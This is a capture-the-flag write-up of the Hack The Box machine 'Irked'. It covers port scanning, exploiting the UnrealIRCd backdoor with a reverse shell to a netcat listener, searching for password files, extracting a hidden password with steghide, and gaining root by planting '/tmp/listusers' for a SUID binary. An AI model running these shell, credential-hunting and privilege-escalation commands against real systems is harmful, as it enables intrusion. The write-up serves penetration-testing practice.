Irked HTB
IP
10.10.10.117Let's start with our initial Nmap scan
sudo nmap -p- --min-rate 10000 10.10.10.117 | cut -d"/" -f1 | tr '\n' ','we can see we have the following ports open
22,80,111,6697,8067,50932,65534
Lets run a more in-depth scan
sudo nmap -sCV -p22,80,111,6697,8067,50932,65534 10.10.10.117 -oA PortScanResults
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-15 23:27 EST
Nmap scan report for 10.10.10.117
Host is up (0.028s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
| 1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
| 2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
| 256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_ 256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html).
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 43635/udp status
| 100024 1 43892/tcp6 status
| 100024 1 50932/tcp status
|_ 100024 1 54829/udp6 status
6697/tcp open irc UnrealIRCd
8067/tcp open irc UnrealIRCd
50932/tcp open status 1 (RPC #100024)
65534/tcp open irc UnrealIRCd
Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.10 secondsWe do find the hostname irked.htb we can add this to our hosts file
HTTP Port 80
When we navigate to the web server we can see the following
we can confirm this is a Debian based server
and the Apache version matches that of the Nmap scan: Apache
2.4.10
Let's get feroxbuster running and see if we can find any interesting directories
feroxbuster -u http://10.10.10.117/ -t 50 -L 5 -n -w /usr/share/seclists/SecLists-master/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txtwe do find
http://10.10.10.117/manual/
Doesnt lead anywhere interesting but would be classed as information disclosure
Since this mentions IRC not a bad place to start enumerating
What is IRC protocol?
Internet Relay Chat is a text-based chat system for instant messaging between internet-connected computers, designed for group communication in forums, and one-on-one communication via private messages
IRC generally runs on the following ports
6667, 6697
We can see from our nmap scans it is running a service called UnrealIRCd
UnrealIRCd is an open-source IRC daemon that utilises the following ports
6697
8067
65534
We can enumerate this daemon
Lets check for the service version using netcat
netcat 10.10.10.117 6697No luck
After abit of reading we can connect to the service using a random nick name so lets try
netcat 10.10.10.117 6697
:irked.htb NOTICE AUTH :*** Looking up your hostname...
:irked.htb NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
PASS shrek123
NICK shrek123
USER shrek123 atshrek Security :shrek123
we can see the version number Unreal3.2.8.1
After abit of googling we can be certain this version is vulnerable to RCE due to a backdoor in the software
Now lets exploit this and gain a shell on the system
we can use the following script
Lets start a netcat listner
rlwrap -cAr nc -lvnp 9001we need to make some slight modifications to the script
add our local ip and port for the shell to connect back to
Now we should be able to run the script
python3 exploit.py -payload bash 10.10.10.117 6697we know have a shell on the target
Priv Esc via ircd
First lets upgrade our shell
python3 -c "import pty;pty.spawn('/bin/bash')"Lets find the version of debian
cat /etc/os-release
Lets find the kernel version
cat /proc/version
Lets check for any other users on the system
cat /etc/passwd
looks like there is one other user on the system
djmardov
Lets find what groups we are in and the user djmardov
groups ircd
groups djmardovResults
ircd@irked:/$ groups ircd
groups ircd
ircd : ircd
ircd@irked:/$ groups djmardov
groups djmardov
djmardov : djmardov cdrom floppy audio dip video plugdev netdev lpadmin scanner bluetooth
Lets see if we can find any interesting files within the system
SUID files
find / -type f -perm /4000 2>/dev/null
Lets search for files with keywords and certain extensions
find / -type f -name "*.txt" 2>/dev/null
find / -type f -name "*pass*" 2>/dev/null
find / -type f -name "*backup*" 2>/dev/nullwe do find something interesting
When we read the file we can see a password
djmardov: UPupDOWNdownLRlrBAbaSSss
We saw ssh is available on the machine
ssh djmardov@10.10.10.117we get a Permission denied might only be acssesible by ssh keys
Lets see if we can just su into the user
su djmardov
su djmardov
Password: UPupDOWNdownLRlrBAbaSSssNo luck again
hmmmm
It took me a minute to notice the sentence super elite steg backup pw so stegenography, weird how the main page of the website only had an image could this be where our password is located
Let's download the image from the main web page
Now lets run steghide with our newly found password
steghide extract -sf irked.jpgthere was a
pass.txtfile located in the image
We know have the password Kab6h+m+bbp2J:HG Lets see if we can ssh into the machine now
ssh djmardov@10.10.10.117 it worked!
Priv Esc via djmardov
Now that we have a ssh session let's start enumerating
when we previously tried to find SUID bits there was one file that looked interesting
find / -type f -perm /4000 2>/dev/null
Why does this program have the SUID bit set
when we run it
/usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2023-12-15 21:13 (:0)
djmardov pts/1 2023-12-16 01:20 (10.10.14.7)
sh: 1: /tmp/listusers: not found
it fails because there is no file named
/tmp/listuserscan we just create one and gain a root shell
echo /bin/bash > /tmp/listusers
chmod 777 /tmp/listusersNow if we run the viewuser programs we should get a root shell
and we do!!
Last updated